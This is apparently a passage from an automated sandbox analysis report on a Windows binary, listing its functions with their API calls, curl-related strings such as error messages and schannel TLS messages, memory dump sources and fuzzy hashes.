Instruction ID: 515220b3efa46f4eedc50d2ccd4bd5f8b31c7235c8e768421bfd0ac007d03607
Opcode Fuzzy Hash: 1430246b4e4cbeb4b7d061ab38bc49f463022b2ac335cc07986ed133e16f4c5b
Instruction Fuzzy Hash: CE328432A08B4281EB28EB25A4502B9B7B1FF88BD5F844135D96E477D4DFBCE445C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9A9B4 Relevance: 74.0, APIs: 29, Strings: 13, Instructions: 530filetimeCOMMON

Download Yara Rule

APIs

_close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA14
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA72
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA8D
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9ABAA
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AE1C
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AE32
_unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7F1D9AE7C
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00007FF7F1D9AED0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00007FF7F1D9AF09
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9AFB1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9AFBF
_get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9AFC8
_lseeki64.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9AFD9
SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1D9AFE9
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9AFFD
CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1D9B06E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B080
SetFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1D9B0BB
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1D9B0C5
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F1D9B0E4
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1D9B0EC
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9B133
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9B149
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9B16C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1D9B182
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1D9B1B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1D9B1BA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1D9B1C4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1D9B1D1

Strings

curl: (%d) %s, xrefs: 00007FF7F1D9AA50
curl: (23) Failed to truncate file, xrefs: 00007FF7F1D9B032
Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u, xrefs: 00007FF7F1D9B0CE
The Retry-After: time would make this command line exceed the maximum allowed time for retries., xrefs: 00007FF7F1D9ADF5
Throwing away %I64d bytes, xrefs: 00007FF7F1D9AFA1
curl: (%d) The requested URL returned error: %ld, xrefs: 00007FF7F1D9AB6C
curl: (23) Failed seeking to end of file, xrefs: 00007FF7F1D9B00C
Removing output file: %s, xrefs: 00007FF7F1D9AE6A
More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo, xrefs: 00007FF7F1D9AA6B
Problem %s. Will retry in %ld seconds. %ld retries left., xrefs: 00007FF7F1D9AF47
Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u, xrefs: 00007FF7F1D9B0F5
Failed to set filetime %I64d on outfile: overflow, xrefs: 00007FF7F1D9AEEE
curl: (%d) Failed writing body, xrefs: 00007FF7F1D9AAA7, 00007FF7F1D9AE51

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$Filefclose$ErrorLast_filenofflushfputs$CloseCreateHandleTime_close_get_osfhandle_lseeki64_strdup_unlinkfseek
String ID: Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u$Failed to set filetime %I64d on outfile: overflow$More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo$Problem %s. Will retry in %ld seconds. %ld retries left.$Removing output file: %s$The Retry-After: time would make this command line exceed the maximum allowed time for retries.$Throwing away %I64d bytes$curl: (%d) %s$curl: (%d) Failed writing body$curl: (%d) The requested URL returned error: %ld$curl: (23) Failed seeking to end of file$curl: (23) Failed to truncate file
API String ID: 1498925360-3108001027
Opcode ID: 550d12ecdff56ceaef0a23f6c9dc6bec3d1a7229724391212ac4868aca746547
Instruction ID: 5a2758a892ac8450df2749bd9d006d8f8ea725c68eb716c6892edc01412e615c
Opcode Fuzzy Hash: 550d12ecdff56ceaef0a23f6c9dc6bec3d1a7229724391212ac4868aca746547
Instruction Fuzzy Hash: A132DD62A0965686FB68EB25C4447B8B3B0FF44784FC58536CA2D0B6D5DFBCE840C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA0658 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 395
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,00007FF7F1D9843C), ref: 00007FF7F1DA06AF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,00007FF7F1D9843C), ref: 00007FF7F1DA06C0
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,00007FF7F1D9843C), ref: 00007FF7F1DA0718
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF7F1DA08A4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF7F1DA0A36
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF7F1DA0B59

Strings

.curlrc, xrefs: 00007FF7F1DA0691, 00007FF7F1DA06D7
%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!, xrefs: 00007FF7F1DA098A
_curlrc, xrefs: 00007FF7F1DA06EF
%s:%d: warning: '%s' %s, xrefs: 00007FF7F1DA0B32
<stdin>, xrefs: 00007FF7F1DA0B0E

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: freemalloc$__acrt_iob_funcfopen
String ID: %s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!$.curlrc$<stdin>$_curlrc
API String ID: 2533209365-1529230327
Opcode ID: 41bbc969c998eaa1a6a2ab3b034595165a186059a2c17a1db967d8fbf99a17b5
Instruction ID: 98e408af58c644b8c471f4b6e3a002e94ce457b42e18eb5d159ef41f2a7cca2d
Opcode Fuzzy Hash: 41bbc969c998eaa1a6a2ab3b034595165a186059a2c17a1db967d8fbf99a17b5
Instruction Fuzzy Hash: 61F10521A0978345FB55EF3594502BCABB1AF05B88FC84539CA6D077C6DFBEA405C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDF964 Relevance: 24.1, APIs: 16, Instructions: 148
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 00007FF7F1DDF9B7
htonl.WS2_32 ref: 00007FF7F1DDF9DE
setsockopt.WS2_32 ref: 00007FF7F1DDFA08
bind.WS2_32 ref: 00007FF7F1DDFA20
getsockname.WS2_32 ref: 00007FF7F1DDFA39
listen.WS2_32 ref: 00007FF7F1DDFA57
socket.WS2_32 ref: 00007FF7F1DDFA6E
connect.WS2_32 ref: 00007FF7F1DDFA8A
ioctlsocket.WS2_32 ref: 00007FF7F1DDFAA8
accept.WS2_32 ref: 00007FF7F1DDFADB
getsockname.WS2_32 ref: 00007FF7F1DDFAF9
getpeername.WS2_32 ref: 00007FF7F1DDFB19
closesocket.WS2_32 ref: 00007FF7F1DDFB48
closesocket.WS2_32 ref: 00007FF7F1DDFB55
closesocket.WS2_32 ref: 00007FF7F1DDFB5E
closesocket.WS2_32 ref: 00007FF7F1DDFB68

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: closesocket$getsocknamesocket$acceptbindconnectgetpeernamehtonlioctlsocketlistensetsockopt
String ID:
API String ID: 2616969812-0
Opcode ID: 11dc6249568054a819cfb97c0cc03107cb4d38a56a3acac441991cfccc9ffb05
Instruction ID: 8fb68997730b3bc8996524b24f3094f28106318229448bc3c53507c215b6b019
Opcode Fuzzy Hash: 11dc6249568054a819cfb97c0cc03107cb4d38a56a3acac441991cfccc9ffb05
Instruction Fuzzy Hash: 5461AE32B0562286F708AF61D8500ACB3B1FB04B58F814535DE2E57B98CFBCD896C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB1D84 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 106
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1DA8
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1DC4
_mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DB1DD7
LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1 ref: 00007FF7F1DB1DF2
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1E09
LoadLibraryExA.KERNELBASE ref: 00007FF7F1DB1E22
GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF7F1DB1E34
GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF7F1DB1E75
LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1 ref: 00007FF7F1DB1ECA

Strings

LoadLibraryExA, xrefs: 00007FF7F1DB1DBA
kernel32, xrefs: 00007FF7F1DB1DA1
AddDllDirectory, xrefs: 00007FF7F1DB1DFF

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: LibraryLoad$AddressDirectoryProcSystem$HandleModule_mbspbrk
String ID: AddDllDirectory$LoadLibraryExA$kernel32
API String ID: 1885204609-3327535076
Opcode ID: 4434697843a5cd4062081c14776d37e9057b5a8912e9a210e3dd3141d5cb97da
Instruction ID: 329dcd4fd337345c8165ad87c3a0251e130be4e4f8404e4850544bf63687030c
Opcode Fuzzy Hash: 4434697843a5cd4062081c14776d37e9057b5a8912e9a210e3dd3141d5cb97da
Instruction Fuzzy Hash: 2C418D11A0874295FB18FB1AB850139A3A5AF48F96F888530CD6F077D4EFBCE44693A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDE930 Relevance: 20.4, Strings: 16, Instructions: 350
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

schannel: failed to read data from server: %s, xrefs: 00007FF7F1DDEDB2
schannel: Curl_read_plain returned CURLE_RECV_ERROR, xrefs: 00007FF7F1DDEABB
schannel: can't renegotiate, encrypted data available, xrefs: 00007FF7F1DDEE01
schannel: server closed abruptly (missing close_notify), xrefs: 00007FF7F1DDEE0D
schannel: an unrecoverable error occurred in a prior call, xrefs: 00007FF7F1DDE9DA
schannel: failed to decrypt data, need more data, xrefs: 00007FF7F1DDED94
schannel: server indicated shutdown in a prior call, xrefs: 00007FF7F1DDE9EC
schannel: SSL/TLS connection renegotiated, xrefs: 00007FF7F1DDECEB
schannel: remote party requests renegotiation, xrefs: 00007FF7F1DDEC6B
schannel: server closed the connection, xrefs: 00007FF7F1DDED1A
schannel: unable to re-allocate memory, xrefs: 00007FF7F1DDEA5C, 00007FF7F1DDEDC6
schannel: can't renegotiate, an error is pending, xrefs: 00007FF7F1DDEDE3
schannel: Curl_read_plain returned error %d, xrefs: 00007FF7F1DDEACC
schannel: renegotiation failed, xrefs: 00007FF7F1DDEDEF
schannel: enough decrypted data is already available, xrefs: 00007FF7F1DDE9BD
schannel: renegotiating SSL/TLS connection, xrefs: 00007FF7F1DDEC95

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renegotiate, an error is pending$schannel: can't renegotiate, encrypted data available$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
API String ID: 0-3083360527
Opcode ID: c3f72a038d7ce50e2676dc4b36a6e8893acae260767b1923e5aea78f1d9cbbc4
Instruction ID: dbb49ebfc4f6f4ec209c66a378a7f9a7ed8cedebe4f7158847078703351f9199
Opcode Fuzzy Hash: c3f72a038d7ce50e2676dc4b36a6e8893acae260767b1923e5aea78f1d9cbbc4
Instruction Fuzzy Hash: C0F1AF72A0874285EB60EF29D480379B7B5FB04B88F905435DA6E066D8DFBCE481D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA44A4 Relevance: 16.5, APIs: 2, Strings: 7, Instructions: 730COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00007FF7F1DA46DD
.%ld, xrefs: 00007FF7F1DA47F2
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00007FF7F1DA49EE, 00007FF7F1DA4A9F
%ld, xrefs: 00007FF7F1DA478E
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00007FF7F1DA44F2, 00007FF7F1DA49E7, 00007FF7F1DA4A98
(nil), xrefs: 00007FF7F1DA4DB0
(nil), xrefs: 00007FF7F1DA4D10

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strncmp
String ID: $%ld$(nil)$(nil)$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1114863663-3012073033
Opcode ID: 4182dc489f97b54357e9e53eb259c5ad35331cb2cf4078041a25781322b9f17f
Instruction ID: 6412f46c09d43e8f21d4480365b977ce833f68966f1e514591c7f33a45befe93
Opcode Fuzzy Hash: 4182dc489f97b54357e9e53eb259c5ad35331cb2cf4078041a25781322b9f17f
Instruction Fuzzy Hash: 53522923A0C58245E765EB25A44437AE7B1BF64798F884230DE7E07BDADFBCE5448390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBADC8 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 516
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DBAF56

Strings

Re-using existing connection #%ld with %s %s, xrefs: 00007FF7F1DBB4E6
host, xrefs: 00007FF7F1DBB4D3
NTLM-proxy picked AND auth done set, clear picked, xrefs: 00007FF7F1DBB698
proxy, xrefs: 00007FF7F1DBB4C8
No connections available., xrefs: 00007FF7F1DBB5AB
No more connections allowed to host: %zu, xrefs: 00007FF7F1DBB59D
No connections available in cache, xrefs: 00007FF7F1DBB703
NTLM picked AND auth done set, clear picked, xrefs: 00007FF7F1DBB669

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host: %zu$Re-using existing connection #%ld with %s %s$host$proxy
API String ID: 1488884202-538710404
Opcode ID: e7186baef5072c63650564064f6cba735f1afcf2fc1e0bfec9d04b1f502ece81
Instruction ID: 08972bebb91795423222bfa68a429c6f0ed50df51ff23e097b8da65ea035705c
Opcode Fuzzy Hash: e7186baef5072c63650564064f6cba735f1afcf2fc1e0bfec9d04b1f502ece81
Instruction Fuzzy Hash: FE426322A05B8295EB54EF29D5503B9A7F4FB45B88F884035CE6E4B3D5DFB8E450C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC1B00 Relevance: 14.2, Strings: 11, Instructions: 464COMMON

Download Yara Rule

Strings

Excess found: excess = %zd url = %s (zero-length body), xrefs: 00007FF7F1DC1CF0
Leftovers after chunking: % I64du bytes, xrefs: 00007FF7F1DC1E1F
Illegal or missing hexadecimal sequence, xrefs: 00007FF7F1DC20FF
Failed reading the chunked-encoded stream, xrefs: 00007FF7F1DC209D
we are done reading and this is set to close, stop send, xrefs: 00007FF7F1DC21D0
Malformed encoding found, xrefs: 00007FF7F1DC20F6
Out of memory, xrefs: 00007FF7F1DC20E4
Excess found in a read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d, xrefs: 00007FF7F1DC1E8D
Bad content-encoding found, xrefs: 00007FF7F1DC20ED
Too long hexadecimal number, xrefs: 00007FF7F1DC2108
%s in chunked-encoding, xrefs: 00007FF7F1DC210F

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: %s in chunked-encoding$Bad content-encoding found$Excess found in a read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d$Excess found: excess = %zd url = %s (zero-length body)$Failed reading the chunked-encoded stream$Illegal or missing hexadecimal sequence$Leftovers after chunking: % I64du bytes$Malformed encoding found$Out of memory$Too long hexadecimal number$we are done reading and this is set to close, stop send
API String ID: 0-2983031399
Opcode ID: 755c89fb7edbe622375bee7e6580487aae65205be194f694c5def9aa4dee93a9
Instruction ID: 76ff3f60e2cfbd3a0d0846490657e77546604f436d762cd32026cd3298f4ad0d
Opcode Fuzzy Hash: 755c89fb7edbe622375bee7e6580487aae65205be194f694c5def9aa4dee93a9
Instruction Fuzzy Hash: 0F22A262A0869285FB15EF75C9542B8A7B5FB45B98F840536DE2D037E4CFB8E940C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAB840 Relevance: 9.2, APIs: 6, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5420041cbda17de0cb4aef5bd157fa47b292bc835db1d31a614bc884b5c3959
Instruction ID: afcf553df4965fcb445c2f395e4224bdecc4ad6b2088599cea8333f891db6dcf
Opcode Fuzzy Hash: b5420041cbda17de0cb4aef5bd157fa47b292bc835db1d31a614bc884b5c3959
Instruction Fuzzy Hash: 6A91D332A1E68186E768EB25D4506BAB3B0FB44B90F805131DE6E077D5DFBCE846C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB20E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF7F1DB2209
send.WS2_32 ref: 00007FF7F1DB222A
WSAGetLastError.WS2_32 ref: 00007FF7F1DB223C

Strings

Send failure: %s, xrefs: 00007FF7F1DB2270

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLastrecvsend
String ID: Send failure: %s
API String ID: 3418755260-857917747
Opcode ID: 1cdd2b38b1936f1c5e32caaaeca32c86b6b2e1835748a7090fd4fdf949a96f8d
Instruction ID: b1dcf00d50a75406149e6c743f90a04e5cad5cfa1f6452bfac27b6039a943dc8
Opcode Fuzzy Hash: 1cdd2b38b1936f1c5e32caaaeca32c86b6b2e1835748a7090fd4fdf949a96f8d
Instruction Fuzzy Hash: 3D41C132A04A8251E764EF19E9847B9A3A0BB48BA5F840339DE3D473D4DFBCE051C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DABDE0 Relevance: 4.8, Strings: 3, Instructions: 1022COMMON

Download Yara Rule

Strings

Hostname '%s' was found in DNS cache, xrefs: 00007FF7F1DAC120
Transfer was pending, now try another, xrefs: 00007FF7F1DAC2D3
operation aborted by pre-request callback, xrefs: 00007FF7F1DAC40B

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: Hostname '%s' was found in DNS cache$Transfer was pending, now try another$operation aborted by pre-request callback
API String ID: 0-929452361
